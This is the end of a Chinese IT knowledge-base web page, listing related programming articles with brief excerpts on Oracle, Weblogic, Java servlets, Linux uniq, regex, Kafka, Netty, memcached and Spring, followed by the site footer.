这个java.exe是你的Oracle 11g安装目录中例如：【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe！ 
注意第一次，使用SQL D</div>
                                </li>
                                <li><a href="/article/172.htm"
                                       title="Weblogic Server Console密码修改和遗忘解决方法" target="_blank">Weblogic Server Console密码修改和遗忘解决方法</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/Welogic/1.htm">Welogic</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在工作中一同事将Weblogic的console的密码忘记了，通过网上查询资料解决，实践整理了一下。 
一.修改Console密码 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 打开weblogic控制台，安全领域&nbsp;--&gt; myrealm --&gt;&n</div>
                                </li>
                                <li><a href="/article/299.htm"
                                       title="IllegalStateException: Cannot forward a response that is already committed" target="_blank">IllegalStateException: Cannot forward a response that is already committed</a>
                                    <span class="text-muted">Cwind</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Servlets/1.htm">Servlets</a>
                                    <div>对于初学者来说，一个常见的误解是：当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。   示例代码：   
protected void doPost() {
    if (someCondition) {
        sendRedirect();
    }
    forward(); // Thi</div>
                                </li>
                                <li><a href="/article/426.htm"
                                       title="基于流的装饰设计模式" target="_blank">基于流的装饰设计模式</a>
                                    <span class="text-muted">木zi_鸣</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>当想要对已有类的对象进行功能增强时，可以定义一个类，将已有对象传入，基于已有的功能，并提供加强功能。 
自定义的类成为装饰类 
 
模仿BufferedReader，对Reader进行包装，体现装饰设计模式 
 
装饰类通常会通过构造方法接受被装饰的对象，并基于被装饰的对象功能，提供更强的功能。 
装饰模式比继承灵活，避免继承臃肿，降低了类与类之间的关系 
 
装饰类因为增强已有对象，具备的功能该</div>
                                </li>
                                <li><a href="/article/553.htm"
                                       title="Linux中的uniq命令" target="_blank">Linux中的uniq命令</a>
                                    <span class="text-muted">被触发</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>Linux命令uniq的作用是过滤重复部分显示文件内容，这个命令读取输入文件，并比较相邻的行。在正常情 况下，第二个及以后更多个重复行将被删去，行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示，则从标准输入读取。 
AD： 
uniq [选项] 文件 
说明：这个命令读取输入文件，并比较相邻的行。在正常情况下，第二个</div>
                                </li>
                                <li><a href="/article/680.htm"
                                       title="正则表达式Pattern" target="_blank">正则表达式Pattern</a>
                                    <span class="text-muted">肆无忌惮_</span>
<a class="tag" taget="_blank" href="/search/Pattern/1.htm">Pattern</a>
                                    <div>正则表达式是符合一定规则的表达式，用来专门操作字符串，对字符创进行匹配，切割，替换，获取。 
&nbsp; 
例如，我们需要对QQ号码格式进行检验 
规则是长度6~12位 &nbsp;不能0开头 &nbsp;只能是数字，我们可以一位一位进行比较，利用parseLong进行判断，或者是用正则表达式来匹配[1-9][0-9]{4,14}&nbsp;或者&nbsp;[1-9]\d{4,14} 
&nbs</div>
                                </li>
                                <li><a href="/article/807.htm"
                                       title="Oracle高级查询之OVER (PARTITION BY ..)" target="_blank">Oracle高级查询之OVER (PARTITION BY ..)</a>
                                    <span class="text-muted">知了ing</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>一、rank()/dense_rank() over(partition by ...order by ...) 
 
现在客户有这样一个需求，查询每个部门工资最高的雇员的信息，相信有一定oracle应用知识的同学都能写出下面的SQL语句： 
 
 select e.ename, e.job, e.sal, e.deptno  
  from scott.emp e,  
       (se</div>
                                </li>
                                <li><a href="/article/934.htm"
                                       title="Python调试" target="_blank">Python调试</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/pdb/1.htm">pdb</a>
                                    <div>原文地址： 
http://blog.csdn.net/xuyuefei1988/article/details/19399137 
1、下面网上收罗的资料初学者应该够用了，但对比IBM的Python 代码调试技巧： 
 
IBM：包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试： 
 
http://www.ibm.com/d</div>
                                </li>
                                <li><a href="/article/1061.htm"
                                       title="webservice传递自定义对象时函数为空，以及boolean不对应的问题" target="_blank">webservice传递自定义对象时函数为空，以及boolean不对应的问题</a>
                                    <span class="text-muted">alleni123</span>
<a class="tag" taget="_blank" href="/search/webservice/1.htm">webservice</a>
                                    <div>今天在客户端调用方法 
NodeStatus status=iservice.getNodeStatus(). 
 
结果NodeStatus的属性都是null。 
 
进行debug之后，发现服务器端返回的确实是有值的对象。 
 
后来发现原来是因为在客户端，NodeStatus的setter全部被我删除了。 
本来是因为逻辑上不需要在客户端使用setter， 结果改了之后竟然不能获取带属性值的</div>
                                </li>
                                <li><a href="/article/1188.htm"
                                       title="java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针" target="_blank">java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针</a>
                                    <span class="text-muted">百合不是茶</span>

                                    <div>C语言的强大在于可以直接操作指针的地址，通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大，初学者很难掌握， java的出现解决了c，c++中指针的问题 java将指针封装在底层，开发人员是不能够去操作指针的地址，但是可以通过引用来间接的操作： 
&nbsp; 
定义一个指针p来指向a的地址（&amp;是地址符号）： 
&nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/1315.htm"
                                       title="Eclipse打不开，提示“An error has occurred.See the log file ***/.log”" target="_blank">Eclipse打不开，提示“An error has occurred.See the log file ***/.log”</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a>
                                    <div>打开eclipse工作目录的\.metadata\.log文件，发现如下错误： 
 
!ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 
!MESSAGE Application error 
!STACK 1 
java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai</div>
                                </li>
                                <li><a href="/article/1442.htm"
                                       title="spring aop实例annotation方法实现" target="_blank">spring aop实例annotation方法实现</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a><a class="tag" taget="_blank" href="/search/annotation/1.htm">annotation</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在spring aop实例中我们通过配置xml文件来实现AOP，这里学习使用annotation来实现，使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut 
AdviceMethods.jav</div>
                                </li>
                                <li><a href="/article/1569.htm"
                                       title="[Velocity一]Velocity语法基础入门" target="_blank">[Velocity一]Velocity语法基础入门</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/velocity/1.htm">velocity</a>
                                    <div>用户和开发人员参考文档 
http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html 
&nbsp; 注释 
1.行级注释## 
2.多行注释#*&nbsp; *# 
&nbsp; 变量定义 
使用$开头的字符串是变量定义，例如$var1, $var2, 
&nbsp; 赋值 
使用#set为变量赋值，例</div>
                                </li>
                                <li><a href="/article/1696.htm"
                                       title="【Kafka十一】关于Kafka的副本管理" target="_blank">【Kafka十一】关于Kafka的副本管理</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a>
                                    <div>1. 关于request.required.acks 
&nbsp; 
request.required.acks控制者Producer写请求的什么时候可以确认写成功，默认是0， 
0表示即不进行确认即返回。 
1表示Leader写成功即返回，此时还没有进行写数据同步到其它Follower Partition中 
-1表示根据指定的最少Partition确认后才返回，这个在 
&nbsp; 
Th</div>
                                </li>
                                <li><a href="/article/1823.htm"
                                       title="lua统计nginx内部变量数据" target="_blank">lua统计nginx内部变量数据</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/lua+nginx%E3%80%80+%E7%BB%9F%E8%AE%A1/1.htm">lua nginx　 统计</a>
                                    <div>server {
    listen 80;
    server_name photo.domain.com;
    location /{set $str $uri;
        content_by_lua '
            local url = ngx.var.uri
            local res = ngx.location.capture(</div>
                                </li>
                                <li><a href="/article/1950.htm"
                                       title="java-11.二叉树中节点的最大距离" target="_blank">java-11.二叉树中节点的最大距离</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.ArrayList;
import java.util.List;


public class MaxLenInBinTree {

	/*
	 a.			1
	 		   /  \
	 		  2    3
	 		 / \  / \
	 		4   5 6  7
	 	max=4	pass &quot;root&quot;
	 </div>
                                </li>
                                <li><a href="/article/2077.htm"
                                       title="Netty源码学习-ReadTimeoutHandler" target="_blank">Netty源码学习-ReadTimeoutHandler</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div> 
ReadTimeoutHandler的实现思路： 
开启一个定时任务，如果在指定时间内没有接收到消息，则抛出ReadTimeoutException 
这个异常的捕获，在开发中，交给跟在ReadTimeoutHandler后面的ChannelHandler，例如 
 
 

private final ChannelHandler timeoutHandler =
	new ReadTim</div>
                                </li>
                                <li><a href="/article/2204.htm"
                                       title="jquery验证上传文件样式及大小(好用)" target="_blank">jquery验证上传文件样式及大小(好用)</a>
                                    <span class="text-muted">cngolon</span>
<a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.htm">文件上传</a><a class="tag" taget="_blank" href="/search/jquery%E9%AA%8C%E8%AF%81/1.htm">jquery验证</a>
                                    <div>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
    &lt;script src=&quot;jquery1.8/jquery-1.8.0.</div>
                                </li>
                                <li><a href="/article/2331.htm"
                                       title="浏览器兼容【转】" target="_blank">浏览器兼容【转】</a>
                                    <span class="text-muted">cuishikuan</span>
<a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a><a class="tag" taget="_blank" href="/search/IE/1.htm">IE</a>
                                    <div>浏览器兼容问题一：不同浏览器的标签默认的外补丁和内补丁不同 
 
问题症状：随便写几个标签，不加样式控制的情况下，各自的margin 和padding差异较大。 
 
碰到频率:100% 
 
解决方案：CSS里&nbsp;&nbsp;&nbsp; *{margin:0;padding:0;} 
 
备注：这个是最常见的也是最易解决的一个浏览器兼容性问题，几乎所有的CSS文件开头都会用通配符*来设</div>
                                </li>
                                <li><a href="/article/2458.htm"
                                       title="Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数" target="_blank">Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a><a class="tag" taget="_blank" href="/search/%24%23/1.htm">$#</a><a class="tag" taget="_blank" href="/search/%24%3F/1.htm">$?</a><a class="tag" taget="_blank" href="/search/%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F/1.htm">特殊变量</a>
                                    <div>前面已经讲到，变量名只能包含数字、字母和下划线，因为某些包含其他字符的变量有特殊含义，这样的变量被称为特殊变量。例如，$ 表示当前Shell进程的ID，即pid，看下面的代码：   
 
  $echo $$  
   
运行结果 
29949 
&nbsp;  特殊变量列表   变量 含义   $0 当前脚本的文件名   $n 传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个</div>
                                </li>
                                <li><a href="/article/2585.htm"
                                       title="程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!" target="_blank">程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/unix/1.htm">unix</a>
                                    <div>翻到一本书，讲到编程一般原则是kiss：Keep It Simple, Stupid.对这个原则深有体会，其实不仅编程如此，而且系统架构也是如此。 
 KEEP IT SIMPLE, STUPID! 编写只做一件事情，并且要做好的程序；编写可以在一起工作的程序，编写处理文本流的程序，因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律，高明的工程师的神圣的“KISS 原</div>
                                </li>
                                <li><a href="/article/2712.htm"
                                       title="android Activity间List传值" target="_blank">android Activity间List传值</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/Activity/1.htm">Activity</a>
                                    <div>第一个Activity： 
import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a</div>
                                </li>
                                <li><a href="/article/2839.htm"
                                       title="tomcat 设置java虚拟机内存" target="_blank">tomcat 设置java虚拟机内存</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/tomcat+%E5%86%85%E5%AD%98%E8%AE%BE%E7%BD%AE/1.htm">tomcat 内存设置</a>
                                    <div>转载请出自出处：http://eksliang.iteye.com/blog/2117772 
http://eksliang.iteye.com/ 
常见的内存溢出有以下两种: 
java.lang.OutOfMemoryError: PermGen space  
java.lang.OutOfMemoryError: Java heap space 
&nbsp; 
------------</div>
                                </li>
                                <li><a href="/article/2966.htm"
                                       title="Android 数据库事务处理" target="_blank">Android 数据库事务处理</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>使用SQLiteDatabase的beginTransaction()方法可以开启一个事务，程序执行到endTransaction() 方法时会检查事务的标志是否为成功，如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务，如果没有调用setTransactionSuccessful() 方法则回滚事务。事</div>
                                </li>
                                <li><a href="/article/3093.htm"
                                       title="Java 打开浏览器" target="_blank">Java 打开浏览器</a>
                                    <span class="text-muted">hw1287789687</span>
<a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E7%BD%91%E5%9D%80/1.htm">打开网址</a><a class="tag" taget="_blank" href="/search/open%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">open浏览器</a><a class="tag" taget="_blank" href="/search/open+browser/1.htm">open browser</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80url/1.htm">打开url</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">打开浏览器</a>
                                    <div>使用java 语言如何打开浏览器呢? 
我们先研究下在cmd窗口中,如何打开网址 
使用IE 打开 
D:\software\bin&gt;cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 
使用火狐打开 
D:\software\bin&gt;cmd /c start firefox http://hw1287789</div>
                                </li>
                                <li><a href="/article/3220.htm"
                                       title="ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件" target="_blank">ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/Google/1.htm">Google</a><a class="tag" taget="_blank" href="/search/google+api/1.htm">google api</a><a class="tag" taget="_blank" href="/search/chrome%E6%8F%92%E4%BB%B6/1.htm">chrome插件</a>
                                    <div>Chrome Web Store 安装地址：&nbsp;https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 
 
 由于众所周知的原因，只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样，通过script标记引用这些资源，让网站访问速度瞬间提速吧</div>
                                </li>
                                <li><a href="/article/3347.htm"
                                       title="进程VS.线程" target="_blank">进程VS.线程</a>
                                    <span class="text-muted">m635674608</span>
<a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a>
                                    <div>资料来源： 
http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点： 
多进程模式最大</div>
                                </li>
                                <li><a href="/article/3474.htm"
                                       title="Linux下安装MemCached" target="_blank">Linux下安装MemCached</a>
                                    <span class="text-muted">字符串</span>
<a class="tag" taget="_blank" href="/search/memcached/1.htm">memcached</a>
                                    <div>前提准备：1. MemCached目前最新版本为：1.4.22，可以从官网下载到。2. MemCached依赖libevent，因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令，查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n</div>
                                </li>
                                <li><a href="/article/3601.htm"
                                       title="java设计模式之--jdk动态代理（实现aop编程）" target="_blank">java设计模式之--jdk动态代理（实现aop编程）</a>
                                    <span class="text-muted">Supanccy2013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a>
                                    <div>&nbsp;&nbsp;&nbsp; 与静态代理类对照的是动态代理类，动态代理类的字节码在程序运行时由Java反射机制动态生成，无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作，而且提高了软件系统的可扩展性，因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 
&</div>
                                </li>
                                <li><a href="/article/3728.htm"
                                       title="Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持" target="_blank">Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持</a>
                                    <span class="text-muted">wiselyman</span>
<a class="tag" taget="_blank" href="/search/spring+4/1.htm">spring 4</a>
                                    <div>2.1 默认方法(default method) 
 
 java8引入了一个default medthod; 
 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 
 使用default关键字 
 Spring 4.2支持加载在默认方法里声明的bean 
  
2.2 
 
 将要被声明成bean的类 
  
public class DemoService {
    </div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>